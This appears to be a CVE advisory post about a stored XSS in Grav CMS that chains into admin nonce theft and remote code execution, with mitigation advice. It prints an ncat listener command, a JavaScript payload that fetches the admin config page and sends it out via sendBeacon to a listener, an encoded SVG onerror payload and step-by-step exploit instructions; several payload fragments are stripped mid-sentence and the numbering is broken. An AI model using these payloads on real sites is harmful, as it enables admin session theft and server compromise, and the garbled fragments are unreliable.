Grav CMS, Stored XSS leading to RCE, GHSA-9695-8fr9-hw5q (Critical)

Listen to this Post

🐢▶️ Listen🚀

How the CVE works (technical details):

A low-privileged user with page creation rights exploits a stored XSS in Grav Core + Admin Plugin (v1.7.49.5 / v1.10.49.1). The flawed XSS filter in `system/src/Grav/Common/Security.php` uses a regex `’on_events’ => ‘(<[^>]+[a-z\x00-\x20\”\’\/])(on[a-z]+|xmlns)\s=[\s|\’\”].[\s|\’\”]>iUu’` that incorrectly assumes event handlers must be preceded by whitespace, single quote, or double quote. Attackers bypass this with unquoted payloads like <img src=x onload=alert(1)>. The filter also lacks dangerous tags such as `<math>, which allow XML‑based scripting. A malicious page containing `` stores the payload. When a Super Admin visits any page, the XSS triggers, sending a fetch request to /grav-admin/admin/config/info. The response contains the admin session context including `admin_nonce` and full system configuration. That data is exfiltrated via `navigator.sendBeacon` to an attacker‑controlled listener. With the valid nonce, the attacker can forge authenticated requests to sensitive admin endpoints, and because Grav supports scheduled tasks and plugins, this chain leads to remote code execution (RCE). The fix (applied 2026-04-24) tightens the regex and adds <svg>, <math>, <option>, `` to the dangerous tags list.

dailycve form:

Platform: Grav CMS
Version: 1.7.49.5/1.10.49.1
Vulnerability: Stored XSS
Severity: Critical (9.0)
date: 2026-05-05

Prediction: 2026-04-24

What Undercode Say:

Analytics – bash commands and code from

Start ncat listener on port 8001
ncat -lvnp 8001
Base64 encoded payload (decoded)
(async()=>{
let r=await fetch('/grav-admin/admin/config/info');
let t=await r.text();
navigator.sendBeacon('http://127.0.0.1:8001/grav-log',t)
})();
Example malicious SVG payload (truncated)
<svg><foreignObject><img src=x onerror=eval(atob('KGFzeW5j...'))></foreignObject></svg>

Exploit:

1. Create low‑privileged user with page CRUD rights.

1. Create a new page and inject the `

3. Start an ncat listener on port 8001.

1. Wait for a Super Admin to browse the Grav site.
2. The admin’s browser executes the XSS, fetches /admin/config/info, and exfiltrates admin_nonce + system info to the listener.
3. Use the stolen nonce to call admin endpoints (e.g., plugin install, system commands) for RCE.

Protection from this CVE

• Upgrade to Grav Core 2.0.0‑beta.2 or higher (commit 5a12f9be8).
• Manually add <svg>, <math>, <option>, `

` to `security.xss_dangerous_tags` in system/config/security.yaml.

Replace the regex‑based XSS filter with a proper HTML sanitizer like HTMLPurifier.

Limit low‑privileged user permissions; disable page creation for untrusted roles.

Impact

Full system compromise via RCE chain. CVSS 9.0 (Critical): low‑privilege, user interaction required, cross‑site scripting leads to admin nonce theft, CSRF bypass, and arbitrary code execution on the server.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin